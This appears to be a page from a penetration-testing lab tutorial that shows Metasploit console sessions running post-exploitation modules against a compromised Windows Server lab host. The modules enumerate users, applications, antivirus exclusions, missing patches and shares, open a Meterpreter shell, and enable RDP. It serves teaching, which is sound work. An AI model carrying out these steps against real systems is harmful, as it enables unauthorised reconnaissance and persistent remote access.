msf5 post(windows/gather/enum_logged_on_users) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/enum_logged_on_users) > run
[*] Running against session 1
Current Logged Users
====================
SID User
--- ----
S-1-5-21-2563855374-3215282501-1490390052-500 WIN-OMCNBKR66MN\Administrator
[+] Results saved in: /root/.msf4/loot/20230212174420_windows_post_10.0.29.158_host.users.activ_793533.txt
Recently Logged Users
=====================
SID Profile Path
--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-2563855374-3215282501-1490390052-500 C:\Users\Administrator
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
msf5 post(windows/gather/enum_logged_on_users) > search checkvm
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/linux/gather/checkvm normal No Linux Gather Virtual Environment Detection
1 post/solaris/gather/checkvm normal No Solaris Gather Virtual Environment Detection
2 post/windows/gather/checkvm normal No Windows Gather Virtual Environment Detection
msf5 post(windows/gather/enum_logged_on_users) > use post/windows/gather/checkvm
msf5 post(windows/gather/checkvm) > show options
Module options (post/windows/gather/checkvm):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(windows/gather/checkvm) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/checkvm) > run
[*] Checking if WIN-OMCNBKR66MN is a Virtual Machine .....
[+] This is a Xen Virtual Machine
[*] Post module execution completed
Target IP Address : 10.0.22.100
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
msf5 post(windows/manage/archmigrate) > search enum_applications
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/enum_applications normal No Windows Gather Installed Application Enumeration
msf5 post(windows/manage/archmigrate) > use post/windows/gather/enum_applications
msf5 post(windows/gather/enum_applications) > show options
Module options (post/windows/gather/enum_applications):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(windows/gather/enum_applications) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/enum_applications) > run
[*] Enumerating applications installed on WIN-OMCNBKR66MN
Installed Applications
======================
Name Version
---- -------
AWS PV Drivers 8.3.3
AWS Tools for Windows 3.15.1084
Amazon SSM Agent 2.3.842.0
Amazon SSM Agent 2.3.842.0
EC2ConfigService 4.9.4222.0
EC2ConfigService 4.9.4222.0
EC2ConfigService 4.9.4222.0
Mozilla Firefox 80.0.1 (x86 en-US) 80.0.1
Mozilla Maintenance Service 80.0.1
aws-cfn-bootstrap 1.4.33
[+] Results stored in: /root/.msf4/loot/20230212181713_windows_post_10.0.22.100_host.application_881038.txt
[*] Post module execution completed
1
2
3
4
5
6
7
8
msf5 post(windows/gather/enum_applications) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
10.0.22.100 host.applications applications.txt text/plain Installed Applications /root/.msf4/loot/20230212181713_windows_post_10.0.22.100_host.application_881038.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
msf5 post(windows/gather/enum_applications) > search type:post platform:windows enum_av
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/enum_av_excluded normal No Windows Antivirus Exclusions Enumeration
msf5 post(windows/gather/enum_applications) > use post/windows/gather/enum_av_excluded
msf5 post(windows/gather/enum_av_excluded) > show options
Module options (post/windows/gather/enum_av_excluded):
Name Current Setting Required Description
---- --------------- -------- -----------
DEFENDER true yes Enumerate exclusions for Microsoft Defender
ESSENTIALS true yes Enumerate exclusions for Microsoft Security Essentials/Antimalware
SEP true yes Enumerate exclusions for Symantec Endpoint Protection (SEP)
SESSION yes The session to run this module on.
msf5 post(windows/gather/enum_av_excluded) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/enum_av_excluded) > run
[*] Enumerating Excluded Paths for AV on WIN-OMCNBKR66MN
[+] Found Windows Defender
[*] No extension exclusions for Windows Defender
[*] No path exclusions for Windows Defender
[*] No process exclusions for Windows Defender
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf5 post(windows/gather/enum_av_excluded) > search enum_computers
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/enum_computers normal No Windows Gather Enumerate Computers
msf5 post(windows/gather/enum_av_excluded) > use post/windows/gather/enum_computers
msf5 post(windows/gather/enum_computers) > show options
Module options (post/windows/gather/enum_computers):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(windows/gather/enum_computers) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/enum_computers) > run
[*] Running module against WIN-OMCNBKR66MN
[-] This host is not part of a domain.
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf5 post(windows/gather/enum_computers) > search enum_patches
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/enum_patches normal No Windows Gather Applied Patches
msf5 post(windows/gather/enum_computers) > use post/windows/gather/enum_patches
msf5 post(windows/gather/enum_patches) > show options
Module options (post/windows/gather/enum_patches):
Name Current Setting Required Description
---- --------------- -------- -----------
KB KB2871997, KB2928120 yes A comma separated list of KB patches to search for
MSFLOCALS true yes Search for missing patches for which there is a MSF local module
SESSION yes The session to run this module on.
msf5 post(windows/gather/enum_patches) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/enum_patches) > run
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
msf5 post(windows/gather/enum_patches) > sessions 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2808 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\hfs>systeminfo
systeminfo
Host Name: WIN-OMCNBKR66MN
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: EC2
Registered Organization: Amazon.com
Product ID: 00252-70000-00000-AA535
Original Install Date: 9/10/2020, 9:10:37 AM
System Boot Time: 2/12/2023, 12:23:27 PM
System Manufacturer: Xen
System Model: HVM domU
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz
BIOS Version: Xen 4.11.amazon, 8/24/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Coordinated Universal Time
Total Physical Memory: 1,024 MB
Available Physical Memory: 573 MB
Virtual Memory: Max Size: 9,216 MB
Virtual Memory: Available: 8,614 MB
Virtual Memory: In Use: 602 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\WIN-OMCNBKR66MN
Hotfix(s): 208 Hotfix(s) Installed.
[01]: KB2894856
[02]: KB2896496
[03]: KB2919355
[04]: KB2919442
[05]: KB2934520
[06]: KB2938066
[07]: KB2938772
[08]: KB2949621
[09]: KB2954879
[10]: KB2955164
[11]: KB2959626
[12]: KB2965500
[13]: KB2967917
[14]: KB2969339
[15]: KB2971203
[16]: KB2973448
[17]: KB2975061
[18]: KB2975719
[19]: KB2977765
[20]: KB2978041
[21]: KB2978126
[22]: KB2984006
[23]: KB2989647
[24]: KB2989930
[25]: KB2993100
[26]: KB2995004
[27]: KB2995388
[28]: KB2996799
[29]: KB2998174
[30]: KB2999226
[31]: KB3000483
[32]: KB3000850
[33]: KB3003057
[34]: KB3004545
[35]: KB3012199
[36]: KB3012702
[37]: KB3013172
[38]: KB3013769
[39]: KB3013791
[40]: KB3013816
[41]: KB3014442
[42]: KB3019978
[43]: KB3021910
[44]: KB3022345
[45]: KB3023222
[46]: KB3023266
[47]: KB3024751
[48]: KB3024755
[49]: KB3030947
[50]: KB3032663
[51]: KB3033446
[52]: KB3035126
[53]: KB3036612
[54]: KB3037579
[55]: KB3038002
[56]: KB3038701
[57]: KB3042085
[58]: KB3044374
[59]: KB3044673
[60]: KB3045634
[61]: KB3045685
[62]: KB3045717
[63]: KB3045719
[64]: KB3045755
[65]: KB3045999
[66]: KB3046017
[67]: KB3046737
[68]: KB3054169
[69]: KB3054203
[70]: KB3054256
[71]: KB3054464
[72]: KB3055323
[73]: KB3055343
[74]: KB3055642
[75]: KB3059317
[76]: KB3060681
[77]: KB3060793
[78]: KB3061512
[79]: KB3063843
[80]: KB3064209
[81]: KB3068708
[82]: KB3071756
[83]: KB3074228
[84]: KB3074548
[85]: KB3075853
[86]: KB3077715
[87]: KB3078405
[88]: KB3078676
[89]: KB3080149
[90]: KB3082089
[91]: KB3083325
[92]: KB3083711
[93]: KB3084135
[94]: KB3084905
[95]: KB3086255
[96]: KB3087137
[97]: KB3091297
[98]: KB3094486
[99]: KB3095701
[100]: KB3097997
[101]: KB3098779
[102]: KB3099834
[103]: KB3100473
[104]: KB3102429
[105]: KB3102467
[106]: KB3102812
[107]: KB3103616
[108]: KB3103696
[109]: KB3103709
[110]: KB3109103
[111]: KB3109976
[112]: KB3110329
[113]: KB3112148
[114]: KB3112336
[115]: KB3115224
[116]: KB3118401
[117]: KB3121261
[118]: KB3122654
[119]: KB3123245
[120]: KB3126434
[121]: KB3126587
[122]: KB3127226
[123]: KB3133043
[124]: KB3133690
[125]: KB3134179
[126]: KB3134815
[127]: KB3135449
[128]: KB3137728
[129]: KB3138602
[130]: KB3138615
[131]: KB3139164
[132]: KB3139398
[133]: KB3139914
[134]: KB3140219
[135]: KB3140234
[136]: KB3141092
[137]: KB3145384
[138]: KB3145432
[139]: KB3146604
[140]: KB3146723
[141]: KB3146751
[142]: KB3147071
[143]: KB3148851
[144]: KB3155784
[145]: KB3156059
[146]: KB3156418
[147]: KB3159398
[148]: KB3161949
[149]: KB3162343
[150]: KB3162835
[151]: KB3172614
[152]: KB3172729
[153]: KB3173424
[154]: KB3175024
[155]: KB3178539
[156]: KB3179574
[157]: KB3179948
[158]: KB3186539
[159]: KB3195387
[160]: KB3210135
[161]: KB4014510
[162]: KB4024847
[163]: KB4033369
[164]: KB4033428
[165]: KB4040972
[166]: KB4041777
[167]: KB4043763
[168]: KB4054566
[169]: KB4054854
[170]: KB4054980
[171]: KB4055001
[172]: KB4056898
[173]: KB4073700
[174]: KB4096417
[175]: KB4098972
[176]: KB4338419
[177]: KB4344145
[178]: KB4457015
[179]: KB4457034
[180]: KB4459941
[181]: KB4470639
[182]: KB4480054
[183]: KB4480095
[184]: KB4483450
[185]: KB4486105
[186]: KB4486545
[187]: KB4495585
[188]: KB4504418
[189]: KB4506993
[190]: KB4506996
[191]: KB4511524
[192]: KB4512938
[193]: KB4514361
[194]: KB4515846
[195]: KB4519567
[196]: KB4521864
[197]: KB4524445
[198]: KB4532940
[199]: KB4533004
[200]: KB4534134
[201]: KB4537482
[202]: KB4540725
[203]: KB4552933
[204]: KB4562253
[205]: KB4565635
[206]: KB4566425
[207]: KB4569753
[208]: KB4571703
Network Card(s): 1 NIC(s) Installed.
[01]: AWS PV Network Device
Connection Name: Ethernet 2
DHCP Enabled: Yes
DHCP Server: 10.0.16.1
IP address(es)
[01]: 10.0.22.100
[02]: fe80::4c22:3b30:ebf7:d602
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
1
2
3
4
C:\hfs>^C
Terminate channel 1? [y/N] y
meterpreter > background
[*] Backgrounding session 1...
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
msf5 post(windows/gather/enum_patches) > search enum_shares
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/enum_shares normal No Windows Gather SMB Share Enumeration via Registry
msf5 post(windows/gather/enum_patches) > use post/windows/gather/enum_shares
msf5 post(windows/gather/enum_shares) > show options
Module options (post/windows/gather/enum_shares):
Name Current Setting Required Description
---- --------------- -------- -----------
CURRENT true yes Enumerate currently configured shares
ENTERED true yes Enumerate Recently entered UNC Paths in the Run Dialog
RECENT true yes Enumerate Recently mapped shares
SESSION yes The session to run this module on.
msf5 post(windows/gather/enum_shares) > set SESSION 1
SESSION => 1
msf5 post(windows/gather/enum_shares) > run
[*] Running against session 1
[*] The following shares were found:
[*] Name: print$
[*]
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf5 exploit(windows/http/rejetto_hfs_exec) > use post/windows/manage/enable_rdp
msf5 post(windows/manage/enable_rdp) > show options
Module options (post/windows/manage/enable_rdp):
Name Current Setting Required Description
---- --------------- -------- -----------
ENABLE true no Enable the RDP Service and Firewall Exception.
FORWARD false no Forward remote port 3389 to local Port.
LPORT 3389 no Local port to forward remote connection.
PASSWORD no Password for the user created.
SESSION yes The session to run this module on.
USERNAME no The username of the user to create.
msf5 post(windows/manage/enable_rdp) > set SESSION 1
SESSION => 1
msf5 post(windows/manage/enable_rdp) > run
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20230212195354_default_10.0.24.125_host.windows.cle_988922.txt
[*] Post module execution completed
-
Previous
Upgrading Command Shells To Meterpreter Shells -
Next
Windows Privilege Escalation Bypassing UAC
